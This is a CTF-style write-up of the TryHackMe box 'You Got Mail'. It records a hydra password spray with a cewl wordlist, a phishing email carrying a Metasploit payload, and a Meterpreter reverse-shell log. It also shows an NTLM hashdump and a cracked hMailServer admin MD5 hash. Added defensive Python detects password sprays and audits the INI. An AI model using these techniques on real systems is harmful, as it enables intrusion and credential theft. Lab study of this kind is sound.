Try Hack Me’s Challenge Box: You Got Mail was a new one on Try Hack Me and it piqued my interest, so I decided to start working on Try Hack Me’s boxes. Below are the notes I documented over the three days (about 2.5 hours of actual work on the box) I spent attacking Try Hack Me’s You Got Mail. I found it to be a succinct box that helped me learn new tools and adapt as quickly as possible to unknowns.
Scope Details
- Active Pentesting allowed: 10.10.206.208
- Passive recon allowed: https://brownbrick.co/
Enumeration
10.10.145.3
Nmap Scan
PORT STATE SERVICE REASON VERSION
25/tcp open smtp syn-ack ttl 125 hMailServer smtpd
| smtp-commands: BRICK-MAIL, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
110/tcp open pop3 syn-ack ttl 125 hMailServer pop3d
|_pop3-capabilities: TOP UIDL USER
135/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 125 Microsoft Windows netbios-ssn
143/tcp open imap syn-ack ttl 125 hMailServer imapd
|_imap-capabilities: QUOTA IDLE IMAP4rev1 completed CAPABILITY OK RIGHTS=texkA0001 IMAP4 NAMESPACE ACL CHILDREN SORT
445/tcp open microsoft-ds? syn-ack ttl 125
587/tcp open smtp syn-ack ttl 125 hMailServer smtpd
| smtp-commands: BRICK-MAIL, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
RDP - 3389/tcp open ms-wbt-server syn-ack ttl 125 Microsoft Terminal Services
| ssl-cert: Subject: commonName=BRICK-MAIL
| Issuer: commonName=BRICK-MAIL
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-02-15T20:59:24
| Not valid after: 2025-08-17T20:59:24
| MD5: 8456:a61c:4afe:248b:2176:02be:4f0b:8b75
| SHA-1: 8a81:5989:0cc1:41ae:1957:4f00:ec0a:d965:70d7:e52e
SMTP(25)
- Attempted password spraying with user lists using both rockyou.txt and custom passwords scraped with cewl, but was unsuccessful.
- Erm, actually I just needed to use the --lowercase flag with cewl.
┌──(kali㉿kali)-[~/tryhackme/mail]
└─$ sudo cewl https://brownbrick.co --lowercase > custom_password2.txt
┌──(kali㉿kali)-[~/tryhackme/mail]
└─$ hydra -L users.txt -P custom_password2.txt mail.thm smtp -V -I
Valid user login
[25][smtp] host: mail.thm login: lhedvig@brownbrick.co password: bricks
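From the defender's side, the hydra run above is a password spray: one source IP, many usernames, a short password list, then one success. The following is an added example (not from the write-up and not hMailServer's code) of the detection logic for that pattern; the log lines are constructed in a simplified format of my own rather than hMailServer's real SMTPD log format, and the sample IPs and the alice/bob/carol users are placeholders.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log, one line per SMTP AUTH attempt, in a simplified
# format of my own (timestamp, client IP, outcome, user), not hMailServer's.
SAMPLE_LOG = """\
2025-02-19 22:30:01 10.13.80.213 AUTH FAIL user=oaurelius@brownbrick.co
2025-02-19 22:30:02 10.13.80.213 AUTH FAIL user=wrohit@brownbrick.co
2025-02-19 22:30:02 10.13.80.213 AUTH FAIL user=lhedvig@brownbrick.co
2025-02-19 22:30:03 10.13.80.213 AUTH FAIL user=alice@brownbrick.co
2025-02-19 22:30:03 10.13.80.213 AUTH FAIL user=bob@brownbrick.co
2025-02-19 22:30:04 10.13.80.213 AUTH FAIL user=carol@brownbrick.co
2025-02-19 22:30:05 10.13.80.213 AUTH OK user=lhedvig@brownbrick.co
2025-02-19 22:35:10 192.0.2.7 AUTH FAIL user=wrohit@brownbrick.co
2025-02-19 22:35:11 192.0.2.7 AUTH OK user=wrohit@brownbrick.co
"""

LINE_RE = re.compile(r"^(?P<ts>\S+ \S+) (?P<ip>\S+) AUTH (?P<res>OK|FAIL) user=(?P<user>\S+)$")

def parse(log_text):
    """Turn log lines into events; lines that don't match are skipped, not fatal."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            events.append({"ts": datetime.fromisoformat(m["ts"]), "ip": m["ip"],
                           "ok": m["res"] == "OK", "user": m["user"]})
    return events

def detect_spray(events, window=timedelta(minutes=5), min_fail=5, min_users=5):
    """Flag a source IP whose failures inside one sliding window span many
    distinct users (a spray, not a single-account brute force), and list the
    users that later logged in successfully from that same IP."""
    by_ip = defaultdict(list)
    for e in events:
        by_ip[e["ip"]].append(e)
    findings = []
    for ip, evs in by_ip.items():
        fails = sorted((e for e in evs if not e["ok"]), key=lambda e: e["ts"])
        best, start = None, 0
        for end in range(len(fails)):
            while fails[end]["ts"] - fails[start]["ts"] > window:
                start += 1  # shrink the window from the left
            chunk = fails[start:end + 1]
            users = {e["user"] for e in chunk}
            if len(chunk) >= min_fail and len(users) >= min_users:
                if best is None or len(chunk) > len(best):
                    best = chunk  # keep the largest qualifying burst
        if best:
            later_ok = sorted({e["user"] for e in evs if e["ok"] and e["ts"] >= best[0]["ts"]})
            findings.append({"ip": ip, "failures": len(best),
                             "users": len({e["user"] for e in best}),
                             "succeeded_after": later_ok})
    return findings
```

Running `detect_spray(parse(SAMPLE_LOG))` reports the first IP only; the second IP's single failure followed by a success is ordinary user behaviour.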
┌──(kali㉿kali)-[~/tryhackme/mail]
└─$ telnet mail.thm 110
Trying 10.10.183.71...
Connected to mail.thm.
Escape character is '^]'.
+OK POP3
user oaurelius
+OK Send your password
-ERR Invalid command in current state.
- Possible login
SMB (136,139,445)
┌──(kali㉿kali)-[~]
└─$ smbclient -L \\mail.thm
Password for [WORKGROUP\kali]:
session setup failed: NT_STATUS_ACCESS_DENIED
brownbrick.co

Username enumeration
- Omar Aurelius
- Winifred Rohit
- Laird Hedvig
  - What’s this dunce’s password? bricks
- Titus Chikondi
- Pontos Cathrine
- Filimena Stamatis
Post Compromise
- Attempting to use remmina to connect to mail.thm through smtp.
- Attempting to swipe email through evolution.
- No emails intercepted, but phishing emails can be sent; maybe I can steal hashes with Responder.
- Sending a phishing email through evolution with a Metasploit-made .exe. Had to update the SMTP port to port 25 and enable auth.
Post Exploitation
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.13.80.213:1338
[*] Sending stage (177734 bytes) to 10.10.145.3
[*] Meterpreter session 1 opened (10.13.80.213:1338 -> 10.10.145.3:49862) at 2025-02-19 22:41:01 -0500
meterpreter > getuid
Server username: BRICK-MAIL\wrohit
- I have taken over user wrohit’s account using a Meterpreter reverse shell made by Metasploit.
wrohit:1014:aad3b435b51404eeaad3b435b51404ee:8458995f1d0a4b0c107fb8e23362c814:::
- Using hashdump I collected wrohit’s NTLM hash.
superstar
- Using hashcat I cracked the password.
C:\Program Files (x86)\hMailServer\Bin>type hMailServer.INI
type hMailServer.INI
[Directories]
ProgramFolder=C:\Program Files (x86)\hMailServer
DatabaseFolder=C:\Program Files (x86)\hMailServer\Database
DataFolder=C:\Program Files (x86)\hMailServer\Data
LogFolder=C:\Program Files (x86)\hMailServer\Logs
TempFolder=C:\Program Files (x86)\hMailServer\Temp
EventFolder=C:\Program Files (x86)\hMailServer\Events
[GUILanguages]
ValidLanguages=english,swedish
[Security]
AdministratorPassword=5f4dcc3b5aa765d61d8327deb882cf99
[Database]
Type=MSSQLCE
Username=
Password=47f104fa02185e821a83b2cfa56cf4ec
PasswordEncryption=1
Port=0
Server=
Database=hMailServer
Internal=1
- Admin password hash: 5f4dcc3b5aa765d61d8327deb882cf99
- Hashcat can crack this.
- Admin password: password
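What a configuration audit would flag in that INI, as an added example (not from the write-up and not hMailServer's own tooling): the admin password is stored as a plain unsalted MD5 digest, so a policy check can compare it against a banned-password list with one hash computation per candidate, and the database password is stored reversibly encrypted rather than hashed. The INI text is a trimmed copy of the one recovered above; the banned-password list is constructed.

```python
import configparser
import hashlib
import re

# Trimmed copy of the hMailServer.INI recovered on the box.
HMAIL_INI = """\
[Security]
AdministratorPassword=5f4dcc3b5aa765d61d8327deb882cf99
[Database]
Type=MSSQLCE
Username=
Password=47f104fa02185e821a83b2cfa56cf4ec
PasswordEncryption=1
Internal=1
"""

# Constructed banned-password list; a real policy check would use a far larger one.
BANNED = ["password", "123456", "admin", "welcome1", "hmailserver"]
MD5_HEX = re.compile(r"^[0-9a-fA-F]{32}$")

def audit(ini_text, banned=BANNED):
    """Return a list of findings about how secrets are stored in the INI."""
    cfg = configparser.ConfigParser(interpolation=None)  # paths contain no % escapes
    cfg.read_string(ini_text)
    findings = []
    admin = cfg.get("Security", "AdministratorPassword", fallback="")
    if MD5_HEX.match(admin):
        # hMailServer keeps this as a bare MD5 of the password: no salt and
        # no work factor, so each offline guess costs one hash computation.
        findings.append("admin password stored as unsalted MD5")
        for cand in banned:
            if hashlib.md5(cand.encode()).hexdigest() == admin.lower():
                findings.append(f"admin password matches banned value '{cand}'")
                break
    elif admin:
        findings.append("admin password not in MD5 hex form; inspect manually")
    db_pw = cfg.get("Database", "Password", fallback="")
    if db_pw and cfg.get("Database", "PasswordEncryption", fallback="0") == "1":
        # PasswordEncryption=1 means encrypted, not hashed: the INI itself is a secret.
        findings.append("database password is reversibly encrypted, not hashed; "
                        "restrict read access to the INI")
    return findings

if __name__ == "__main__":
    for finding in audit(HMAIL_INI):
        print("-", finding)
```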